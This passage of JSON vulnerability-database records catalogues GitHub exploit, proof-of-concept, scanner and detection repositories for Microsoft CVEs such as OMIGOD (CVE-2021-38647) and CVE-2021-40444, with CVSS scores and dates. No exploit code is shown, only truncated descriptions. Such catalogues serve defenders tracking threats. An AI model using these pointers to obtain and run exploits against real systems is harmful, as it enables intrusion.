["CVE-2021-38659"], "modified": "2021-09-16T00:00:00", "id": "ZDI-21-1084", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-1084/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T15:33:57", "description": "Windows win32k ascension UAC ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-17T02:09:37", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38639"], "modified": "2021-09-17T02:38:42", "id": "745C9387-7E9D-5BA8-BC2D-5B3EF7DCE82A", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:11:02", "description": "# CVE-2021-38647: Omigod\nAnother exploit for Omigod written quic...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-26T18:06:00", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-29T10:57:34", "id": "A99AB73C-8E46-5B9C-A402-F78F96EE2327", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:11:26", "description": "# OMIGOD PoC\n\n## Usage\n\n```\n$ go run CVE-2021-38647.go -h\n\nUSAGE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T01:05:22", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-22T22:40:10", "id": "CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-10T07:14:55", "description": "# Details\n## OMIGod - CVE-2021-38647\nOpen Management Infrastruct...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-19T15:43:32", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-10T05:21:40", "id": "64DFB465-6754-5E4B-B311-7668EDD4D962", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T23:40:22", "description": "# CVE-2021-38647\n\nCVE-2021-38647 - POC to exploit unauthenticate...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-20T16:29:48", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-09T18:59:00", "id": "FA1DEEA0-A8AF-5C21-98E6-9D3379266529", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:58", "description": "# CVE-2021-38647 AKA \"OMIGOD\"\nA Zeek package which detects CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T04:51:02", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2023-09-16T21:47:30", "id": "8217668C-9748-5511-8C01-7E933D69F872", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:57", "description": "# omigood (OM I GOOD?)\n\nThis repository contains a free scanner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T15:34:03", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-07-13T20:33:30", "id": "A6B7D4D8-4578-5AD8-961D-3BC35007FF29", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:40", "description": "# OMIGOD_cve-2021-38647\nCVE-2021-38647 is an unauthentica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T10:53:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-10T08:48:26", "id": "54D698B4-9CF0-5D7F-88D2-1053A11EA7C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T06:18:53", "description": "# OMIGOD\nProof on Concept Exploit for CVE-2021-38647 (OMIGOD)\n\nF...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T02:11:36", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-17T05:00:10", "id": "BF40B403-9D06-5460-8B40-3FC2E56A4A07", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:56", "description": "# cve-2021-38647\nA PoC exploit for CVE-2021-38647 RCE in OMI.\n\nE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T08:33:02", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-29T12:13:38", "id": "8B4EDA16-9E27-500D-B648-9C3AD4295562", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:00", "description": "# CVE-2021-38647\n\n\nThis is a POC for CVE-2021-38647 :\n\nSend a PO...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T21:44:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-19T05:39:40", "id": "1EC6324C-A18E-517A-9A55-F1C2D1BCA358", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:26", "description": "# cve-2021-38647\nhttps://github.com/corelight/CVE-2021-38647 wit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T15:20:40", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-22T15:29:15", "id": "610ADCD3-C281-52D4-A546-467569FE3AC1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:55", "description": "# Readme\n\nAn educational lab VM to learn about the 9.6 CVSS unau...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T15:25:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-27T11:34:25", "id": "09412330-832C-538A-A226-61474048E41B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, 